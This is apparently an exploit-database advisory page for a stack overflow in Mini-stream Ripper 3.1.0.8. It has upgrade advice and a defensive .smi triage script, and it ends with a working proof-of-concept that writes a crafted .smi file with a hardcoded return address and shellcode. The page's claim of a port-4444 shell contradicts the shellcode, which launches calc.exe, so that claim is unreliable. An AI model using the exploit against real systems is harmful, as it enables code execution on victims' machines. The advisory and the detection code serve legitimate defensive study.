Vendor: Mini-stream Ripper
By: Hazem Mofeed
CVSS: 7.2 (HIGH)
CWE: 121 (Stack Overflow)
Product Name: Mini-stream Ripper
Affected Version From: 3.1.0.8
Affected Version To: 3.1.0.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:mini-stream:mini-stream_ripper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit

Mini-stream Ripper 3.1.0.8 is vulnerable to a local stack overflow. By sending a specially crafted .smi file, an attacker can overwrite the saved return address on the stack and execute arbitrary code. The exploit code contains shellcode that spawns a shell on port 4444.

Mitigation:

Upgrade to the latest version of Mini-stream Ripper.
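
Where upgrading cannot happen immediately, .smi files can be triaged before they reach the player. The following is an added example, not part of the original advisory or the exploit author's code: it flags the file shape used by the exploit listing on this page (one very long filler run followed by binary bytes). It assumes a legitimate .smi playlist is line-oriented text; the thresholds and sample inputs are constructed for illustration.

```python
import re

# Thresholds are assumptions for illustration, not values from the page.
MAX_LINE_LEN = 4096   # longest line expected in a text playlist
MAX_BYTE_RUN = 1024   # longest run of one repeated byte tolerated
# C0 control bytes (minus tab, LF, CR) plus DEL: not expected in a text file.
CONTROL = bytes(sorted((set(range(0x20)) - {0x09, 0x0A, 0x0D}) | {0x7F}))


def longest_line(data: bytes) -> int:
    """Length in bytes of the longest line in the file."""
    return max((len(line) for line in data.splitlines()), default=0)


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte."""
    # Each regex match is one maximal run of the same byte value.
    runs = re.finditer(rb"(.)\1*", data, re.DOTALL)
    return max((m.end() - m.start() for m in runs), default=0)


def control_count(data: bytes) -> int:
    """Number of control bytes that a text playlist should not contain."""
    return len(data) - len(data.translate(None, CONTROL))


def triage_smi(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if (n := longest_line(data)) > MAX_LINE_LEN:
        findings.append(f"line of {n} bytes exceeds {MAX_LINE_LEN}")
    if (n := longest_run(data)) > MAX_BYTE_RUN:
        findings.append(f"run of {n} identical bytes exceeds {MAX_BYTE_RUN}")
    if (n := control_count(data)) > 0:
        findings.append(f"{n} control byte(s) in a text playlist")
    return findings


# Constructed samples: a small text playlist, and a filler run of the length
# used in the listing followed by placeholder bytes (not the page's payload).
BENIGN = (b'<smil>\r\n<body>\r\n'
          b'<audio src="http://example.invalid/a.mp3"/>\r\n</body>\r\n</smil>\r\n')
SUSPICIOUS = b"A" * 43496 + bytes(range(1, 9)) + b"\x00"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, triage_smi(blob) or "no findings")
```

A finding is a reason to quarantine the file for review, not proof of malice; a file that passes is not proven safe.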

Exploit-DB raw data:

# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Author: Hazem Mofeed
# Download: http://www.mini-stream.net/mini-stream-ripper/download/
# Home: http://hakxer.wordpress.com

# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..
          # http://www.exploit-db.com/exploits/11607
shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
   "\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
   "\x63\x2e\x65\x78\x65\x00") # SP3(sh)

# exploit
exploit = ("\x41" * 43496 +  "\x08\x6A\x83\x7C" + "\x08\x6A\x83\x7C" + shellcode )
file = open("exploit.smi","w")
file.write(exploit)
file.close()